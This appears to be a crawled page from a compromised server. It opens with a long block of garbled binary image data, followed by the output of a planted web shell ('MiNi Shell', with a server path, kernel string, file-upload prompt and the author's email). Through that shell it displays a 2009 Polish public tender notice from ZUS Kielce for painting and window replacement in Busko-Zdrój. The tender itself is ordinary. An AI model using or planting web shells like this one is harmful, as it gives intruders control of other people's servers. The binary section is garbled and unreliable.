JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090604/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090604/86603-N-2009.html

<p class="kh_header"><b>Kielce: Malowanie pomieszczeń i wymiana okien w budynku Inspektoratu ZUS w Busku-Zdroju przy ul. Partyzantów 33</b><br>
<b>Numer ogłoszenia: 86603 - 2009; data zamieszczenia: 04.06.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Ubezpieczeń Społecznych Oddział w Kielcach , ul. Piotrkowska 27, 25-510 Kielce, woj. świętokrzyskie, tel. 041 3677100, faks 041 3677391.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zus.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Instytucja ubezpieczenia społecznego i zdrowotnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Malowanie pomieszczeń i wymiana okien w budynku Inspektoratu ZUS w Busku-Zdroju przy ul. Partyzantów 33.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Malowanie pomieszczeń i wymiana okien w budynku Inspektoratu ZUS w Busku-Zdroju przy ul. Partyzantów 33.
Całkowita wielkość zamówienia: postępowanie o wartości poniżej 5.150.000 Euro..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.44.21.00-8, 45.41.00.00-4, 45.42.11.25-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do udziału w postępowaniu zobowiązany jest do wniesienia wadium w wysokości: 
1) 800,00 zł (przystępując do zadania 1),
2) 600,00 zł (przystępując do zadania 2).<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wnieśli wadium, nie podlegają wykluczeniu z postępowania na podstawie art. 24 ustawy z 29 stycznia 2004r. Prawo zamówień publicznych (t.jedn. Dz. U. z 2007r. Nr 223 poz. 1655 ze zm.), zwanej dalej u.p.z.p., spełniają warunki określone w art. 22 ust. 1 pkt. 1-3 u.p.z.p. oraz:
1) dysponują osobą, która może pełnić samodzielne funkcje techniczne w budownictwie 
i posiada uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej,
2) wykonali należycie w okresie ostatnich 5 (pięciu) lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie:
a) co najmniej dwie roboty polegające na wykonaniu gładzi gipsowych wraz z malowaniem o powierzchni minimum 1500 m2  każda - przystępując do zadania 1;
b) co najmniej dwie roboty polegające na wymianie okien o powierzchni minimum 100 m2  każda - przystępując do zadania 2.
Zamawiający dokona oceny spełniania warunków udziału w postępowaniu na podstawie wymaganych dokumentów i oświadczeń na zasadzie (spełnia / nie spełnia)..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wymagane przez Zamawiającego oświadczenia i dokumenty potwierdzające spełnienie warunków udziału w postępowaniu:
1) oświadczenie wykonawcy, że nie podlega wykluczeniu z postępowania o udzielenie zamówienia publicznego na podstawie art. 24 u.p.z.p. oraz spełnia warunki określone w art. 22 ust. 1 u.p.z.p. (zgodne z załączonym wzorem - załącznik nr 3 do SIWZ),
2) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
3) oświadczenie wykonawcy, kto będzie kierował robotami budowlanymi stanowiącymi przedmiot zamówienia (zgodne z załączonym wzorem - załącznik nr 5 do SIWZ),
4) uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej oraz aktualne zaświadczenie potwierdzające członkostwo we właściwej Izbie Inżynierów Budownictwa dla kierownika robót wymienionego w oświadczeniu, o którym mowa w ppkt 3
5) wykaz robót budowlanych wykonanych przez wykonawcę w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, polegających na:
a) wykonaniu gładzi gipsowych wraz z malowaniem, z podaniem miejsca i czasookresu wykonanych robót, powierzchni wykonanych gładzi wraz z malowaniem, oraz firm i siedzib zleceniodawców (zgodny z załączonym wzorem - załącznik nr 4a do SIWZ)
b) wymianie okien, z podaniem miejsca i czasookresu wykonania robót, powierzchni wymienionych okien oraz firm i siedzib zleceniodawców (zgodny z załączonym wzorem - załącznik nr 4b do SIWZ).
W wykazie należy wymienić:
a) co najmniej dwie roboty obejmujące swym zakresem wykonanie gładzi gipsowych wraz z malowaniem o powierzchni min. 1500 m2 każda - (przystępując do zadania 1),
b) co najmniej dwie roboty obejmujące swym zakresem wymianę okien o powierzchni min. 100 m2  każda - (przystępując do zadania 2).
Do wykazu należy dołączyć dokumenty potwierdzające należyte wykonanie robót wymienionych w wykazie (np. referencje).

Wymagane przez Zamawiającego oświadczenia lub dokumenty potwierdzające spełnienie przez oferowane roboty wymagań określonych przez Zamawiającego: 
1) przystępując do zadania 2 - wypełnione oświadczenie wykonawcy o parametrach technicznych oferowanych okien (zgodne z załączonym wzorem, stanowiącym załącznik nr 6 do SIWZ), wraz z załączeniem dokumentów odnoszących się do zaproponowanych okien:
a. aktualna aprobata techniczna (kompletna wraz z załącznikami) dla proponowanych okien odnosząca się do okna jako całego wyrobu w myśl art. 9 ustawy z dnia 16 kwietnia 2004 roku o wyrobach budowlanych (Dz.U. Nr 92, poz. 881) stwierdzająca, iż okna są przydatne do stosowania w budownictwie,
b. aktualny certyfikat lub deklaracja zgodności z polską normą lub aprobatą techniczną dla zastosowanych okuć lub inny dokument potwierdzający, iż są one dopuszczone do obrotu i stosowania w budownictwie wydane przez uprawniony organ,
Uwaga: należy przedłożyć ww. certyfikaty, deklaracje lub dokumenty dla zastosowanych okuć uchylnych, rozwieralno -uchylnych oraz okuć rozwieralnych. 
c. aktualny atest lub świadectwo z badań palności profilu zastosowanego do produkcji okien wydane przez uprawniony do tego organ, potwierdzające iż profil został sklasyfikowany co najmniej jako trudno zapalny wg. Normy PN-B-02874:1996 albo Normy PN-EN 13501-1:2004 lub Normy BN-87/8826-02,
d. aktualny certyfikat lub deklaracja zgodności z polską normą lub aprobatą techniczną dla zastosowanych szyb lub inny dokument potwierdzający, iż są one dopuszczone do obrotu i stosowania w budownictwie zgodnie z ustawą z dnia 16 kwietnia 2004 roku o wyrobach budowlanych (Dz.U. Nr 92, poz. 881),
e. aktualny atest lub świadectwo z badań przenikalności cieplnej szyb zespolonych  lub inny dokument potwierdzający, iż szyby zespolone posiadają współczynnik przenikalności cieplnej U mniejsze lub równe 1,1 W/(m2K) (wg normy PN-EN 674: 1999);
f. aktualny atest higieniczny dla profili wydany przez PZH lub inny uprawniony do tego organ, stwierdzający, iż zaproponowany produkt jest dopuszczony do stosowania w budownictwie mieszkaniowym i obiektach użyteczności publicznej,
2) wyceniony przedmiar robót (zgodny z przedmiarem, stanowiącym załącznik nr 7a do SIWZ - przystępując do zadania 1 lub załącznik nr 7b do SIWZ - przystępując do zadania 2)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zus.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> osobiście: pok 419 ul. Kolberga 2a w Kielcach
pocztą: po przesłaniu pisemnego zapotrzebowania na adres ZUS Oddział w Kielcach ul. Piotrkowska 27, 25-510 Kielce lub pod nr fax. 0413445072.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.06.2009 godzina 10:00, miejsce: osobiście: pok 419 ul. Kolberga 2a w Kielcach
pocztą: na adres ZUS Oddział w Kielcach ul. Piotrkowska 27, Samodzielny Regerat Zamówień Publicznych, 25-510 Kielce.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> zadanie 1:- malowanie pomieszczeń w budynku Inspektoratu ZUS w Busku-Zdroju przy ul. Partyzantów 33,.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> malowanie pomieszczeń w budynku Inspektoratu ZUS w Busku-Zdroju przy ul. Partyzantów 33.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.44.21.00-8, 45.41.00.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> zadanie 2 - wymiana okien w budynku Inspektoratu ZUS w Busku-Zdroju przy ul. Partyzantów 33..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> wymiana okien w budynku Inspektoratu ZUS w Busku-Zdroju przy ul. Partyzantów 33..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.42.11.25-6, 45.44.21.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com